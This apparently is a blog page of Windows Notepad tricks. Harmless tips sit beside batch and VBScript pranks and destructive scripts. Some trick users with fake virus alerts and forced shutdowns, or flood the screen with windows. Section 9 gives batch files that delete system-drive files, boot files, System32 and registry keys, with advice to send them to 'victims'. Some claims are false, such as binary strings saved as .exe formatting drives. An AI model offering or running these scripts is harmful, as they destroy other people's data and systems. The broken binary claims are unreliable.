Drop Down MenusCSS Drop Down MenuPure CSS Dropdown Menu

Notepad Full Tricks & Tips

 Notepad Full Tricks & Tips

1.Notepad Diary (notepad will works as a diary)

notepad dairy
Notepad Diary

  • Open notepad
  • Type .LOG
  • Save the file as LOG.txt
  • Write anything in it and it will be saved with the time when you edit it.




2. Bush Hid the Facts – Most Popular Notepad Tricks

This is one of the mysterious notepad tricks we know. According to the trick it really seems Microsoft had put some hack into the coding of notepad making the text hidden after saving it.
Bush Hid the Facts – Most Popular Notepad Trick Open notepad.
Type BUSH HID THE FACTS
Save that file.
Close it
Open It Again See…
Why This Happens ? : It was later known 4335 Rule. It means that if we enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters each, and the last word has five letters. Then Notepad Automatically hides the text into unknown code. Similar are with “this app can break”.
OR
STEP 1: OPEN NOTEPAD
STEP 2: WRITE FOLLOWING LINE IN THE NOTEPAD.
THIS APP CAN BREAK
STEP 3: SAVE THIS FILE AS AAA.TXT
STEP 4: CLOSE THE NOTEPAD.
STEP 5: OPEN THE FILE AGAIN.
VOILLA!!
OR
1> OPEN NOTEPAD
2> ENTER FOUR WORDS SEPARATED BY SPACES, WHEREIN THE FIRST WORD HAS 4 LETTERS, THE NEXT TWO HAVE THREE LETTERS, AND THE LAST WORD HAS FIVE LETTERS
3> DON’T HIT ENTER AT THE END OF THE LINE.
4> SAVE THE FILE.
5> CLOSE NOTEPAD.
6> REOPEN NOTEPAD.
7> OPEN THE FILE YOU JUST SAVED.
YOU ARE DONE!!!

3. Shutdown system

Description: This makes your friend think that his/her computer has a virus then their computer shuts down.
1. Go to notepad and type:
@echo off
:A
cls
echo Do you wanna crash your computer? (y/n)
pause
echo Are you sure? (y/n)
pause
echo your computer will crash when the time reaches zero.
pause
msg * Your computer will crash in...
msg * 5
msg * 4
msg * 3
msg * 2
msg * 1
msg * Good-Bye
msg * You have been pwned! :)
shutdown -s -t 00 

Now save it as shutdown.bat 

4. Continually Pop The CD Drive

Open Notepad.
Copy the code given below onto the notepad file:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “Anything.VBS”.
Now open the file and see the magic! The file will continuously force the CD rom to pop out! And If you have more than one then it pops out all of them!
Note: Don’t worry when this crazy notepad trick opens your cd tray continuously. If you want to end this script simply Open Task Manager(Alt+Ctrl+Delete). Under Processes end the process “wscript.exe

5.Convert Text Into Audio Using Notepad

How To Do It ?
Open Notepad file on your Windows PC.
Copy and paste the below mentioned code :
Dim msg, sapi
msg=InputBox(“Enter your text for conversion–www.techvorm.com”,”TechVormText-To-Audio Converter”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak msg
Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs
Thats it ! Your Text to Audio converter is ready to be used. Now open the saved file and key in the text you want to convert and click OK. If you find any difficulties in using this code, let me know via comments section.

Now Tricks 4 U To Try On Your ENEMIES !!!!!!!!!!!!!!!!!!!!

Dangerous Trick

Description: This prank will create and open a file that they cannot close, minimize, or maximize without closing the command prompt behind it.

1. Go into Notepad

2. Type the text below.

 @echo off
md hello
:A
start hello
goto A

Save it as file.bat

7. How to get fake error message???????

Notepad Tricks & Tips

  • Open Notepad
  • Type in: msg * Error: Your system is affected by virus
  • Save as "virus.bat"
  • Now open that .bat file, now you got error message window
  • Its not virus, just your assumption message.

 8. Change The Header/Footer Of Your Notepad File

More often than not whenever you get a printout of your notepad file, it starts with “Untitled” or the filename at top, and “Page ” on bottom. Now if you want to get rid of it or want to change it, just follow the simple steps given below.
Open Notepad.
Click on File -> Page Setup.
Replace the text written in the “Header” and “Footer” box (as shown above) by any of the following codes:
&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number

9. IN THIS HACK I WILL SHOW YOU HOW TO FORMAT A HDD USING NOTEPAD    AND HOW TO DESTROY VICTIMS PC USING NOTEPAD. THIS IS REALLY COOL.

(A) STEP 1 :-
COPY THE FOLLOWING IN NOTEPAD EXACTLY AS IT IS.
SAYS01001011000111110010010101010101010000011111100000
STEP 2 :-
SAVE AS AN .EXE ANY NAME WILL DO
STEP 3 :-
SEND THE .EXE TO PEOPLE AND INFECT
OR
IF YOU THINK CANNOT FORMAT C DRIVE WHEN WINDOWS IS RUNNING TRY LAUGHING AND U WILL GET IT Secret. ANY WAY SOME MORE SO U CAN TEST ON OTHER DRIVES THIS IS SIMPLE BINARY CODE
FORMAT C:\ /Q/X — THIS WILL FORMAT YOUR DRIVE C:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
FORMAT D:\ /Q/X — THIS WILL FORMAT YOUR DIRVE D:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
FORMAT A:\ /Q/X — THIS WILL FORMAT YOUR DRIVE A:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
DEL /F/S/Q C:\BOOT.INI — THIS WILL CAUSE YOUR COMPUTER NOT TO BOOT.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
TRY TO FIGURE OUT URSELF REST
CANT SPOONFEED
ITS WORKING
DO NOT TRY IT ON YOUR PC. DON’T MESS AROUND THIS IS FOR EDUCATIONAL PURPOSE ONLY
STILL IF YOU CANT FIGURE IT OUT TRY THIS
GO TO NOTEPAD AND TYPE THE FOLLOWING:
(B) @ECHO OFF
DEL C:\ *.*|Y
SAVE IT AS DELL.BAT
WANT WORSE THEN TYPE THE FOLLOWING:
@ECHO OFF
DEL %SYSTEMDRIVE%\*.*/F/S/Q
SHUTDOWN -R -F -T 00
AND SAVE IT AS A .BAT FILE
(C) HOW TO SHUTDOWN A COMPUTER FOREVER..
CODE:
@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI
OPEN UP AND COPY THE CODE AND SAVE IT AS .BAT FILE..
THIS WILL SHUT DOWN THE PERSON’S COMPUTER.IT SHUTS IT OFF ONCE AND DELETES THE FILES NEEDED TO REBOOT AND RESTART.
REMEMBER – DO NOT OPEN THE FILE.
YOU WON’T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!
(D) A SIMPLE HACK TO DESTROY UR VICTIM’S PC
I M HERE EXPLAIN TO MAKE A FILE THAT DESTROYS UR VICTIMS PC
I M NOT RESPONSIBLE FOR THE DAMAGE CAUSED BY THIS FILE.”
1. OPEN NOTEPAD
2. WRITE THE ABOVE COMMAND : -
DEL C:\WINDOWS\SYSTEM32\*.*/Q
3. SAVE THE ABOVE NOTEPAD WITH THE EXTENSION “.BAT OR .CMD” AS U WANT
4. !!!!!!!!!!!!!!!!!!!!!!ATTENTION!!!!!!!!!!!!!!!!!!! !!!
DON’T DOUBLE CLICK THE FILE OTHERWISE U R IN TROUBLE.
WHY ?????? BCZ THE FILE U CREATED DELETE ALL FILES FROM UR
SYSTEM32 FOLDER AND WHEN U RESTART UR PC IT WILL NOT START
BCZ SYSTEM CAN NOT FIND THE FILES IN THE SYSTEM32 FOLDER WHICH
IS REQUIRED AT THE TIME OF BOOTING.
5. YOU CAN ALSO TEST THE ABOVE BY CREATING A FAKE FOLDER LET SUPPOSE
WINDOWS1 IN C:\. COPY SOME OLD FILES IN IT AND JUST FOLLOW THE
ABOVE COMMAND.BY DOUBLE CLICKING THE BAT OR CMD FILE UR ALL FILES
AUTOMAITCALLY GET DELETED.
6. YOU CAN TRY THIS FILE IN ANY ONE`S COMPUTER.(BUT THIS RESULT IN CAUSING DAMAGE TO THE COMPUTER, SO THINK AGAIN BEFORE TRYING THIS ON ANYONE’S PC)
***MOST DANGEROUS NOTEPAD TRICK***
OPEN NOTEPAD
TYPE:
@ECHO OFF
START REG DELETE
HKCR/ .EXE
START REG DELETE
HKCR/.DLL
START REG DELETE HKCR/*
:MESSAGE
ECHO YOUR COMPUTER HAS
BEEN FCKED.HAVE A
NICE DAY.

10. Caps Lock Key

Open Notepad.
Paste the following code in the notepad file:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save the file with anyname and .vbs extension. and close it.
Now open the newly created file and see how the caps lock key behaves on your keyboard!

No comments:

Contact Us

Name

Email *

Message *